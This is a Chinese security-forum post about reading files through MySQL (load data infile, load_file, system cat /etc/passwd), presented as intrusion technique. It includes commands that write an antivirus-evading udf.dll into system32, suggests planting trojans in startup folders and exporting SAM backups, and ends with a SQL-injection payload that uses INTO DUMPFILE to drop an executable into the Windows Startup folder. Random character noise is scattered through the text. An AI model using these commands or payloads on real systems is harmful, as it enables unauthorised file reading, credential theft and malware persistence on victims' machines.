找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2033|回复: 0
打印 上一主题 下一主题

mysql下读取文件的几种方式

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:34:37 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。 % b/ ?3 F! I& F0 o8 b9 g2 n
思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同
. N$ f  M1 @: a- \- g/ F4 U5 F# H$ S7 K  ^- z; P
mysql3.x下
- j( V  n$ }- `- Z5 N$ C$ w% W( h+ m( ~% D$ p' N$ h( Y/ O, {* M
不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下 * [" t% h. d) u( ~8 P
* U+ @8 s! q+ E. Y9 K, I
mysql>create table a (cmd text); 0 C% v" n6 J  ]! ?, l8 _# q
mysql>load data infile 'c:\\boot.ini' into table a;
5 k7 ^* o- X3 umysql>select * from a; ' a# P; u5 E: A
' J4 H# g1 b5 y9 N
mysql4.x下
* L  H0 {9 {3 B4 A; H5 {1 D6 }! G/ H* I/ i* E' D
mysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下 : A8 h0 m; {- s9 D- P  @5 P' i
) p, }( l. X3 l3 R
mysql>create table a (cmd text);
* U6 o5 X& z6 ^& }0 Jmysql>insert into a (cmd) values (load_file('c:\\boot.ini')); 6 |: C8 o1 Y4 _% B3 n& ^/ e
mysql>select * from a;
: _1 C$ g% k6 ?8 j
9 m" ?7 ~% m7 Q1 e, {mysql5.x下
2 P1 i8 }  l5 M4 S( G
- r% K1 P7 `' @在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下 4 b" V, O# H0 G, i4 o
$ x9 u% e: u1 `9 q% i& a
mysql>system cat /etc/passwd
$ L3 U# s8 H  q$ H* Z2 p2 V% X6 c$ k3 V

" Y6 L3 `# k+ P- T2 [: Hmysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。
3 N% s1 \# Z# e0 o0 ~( m
  E# P! I1 T1 {* `) f% q: ~& }
例:把免杀过的udf.dll文件插入系统目录 1 t' Z9 [! P8 U( f# p3 o* O
% M+ Q7 }5 {) `# f6 v4 }8 l
create table a (cmd LONGBLOB);
) V" n0 ]1 H  ?insert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll'))); * B2 k) O( E2 P& @' P% j# R$ p( M
SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll'; + [5 ]* l- _% W" L( r0 k, ^- s
* a, l# g  X4 K: j' z
其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。 6 L* ~( E0 E2 A2 g1 K

3 [, B# C# O* P1 j. ~( h% A
8 U$ y" w+ u0 F: b2 K注入中的语法(未测试)
9 s1 a" ^6 v, ~9 C! F
) c6 ]3 {: v& F( r3 M* J
/ ^& V) H9 B9 ]# h0 Uid=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 INTO DUMPFILE 'C:\\Documents and Settings\\All Users\\「开始」菜单\程序\启动\\mm.exe'/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表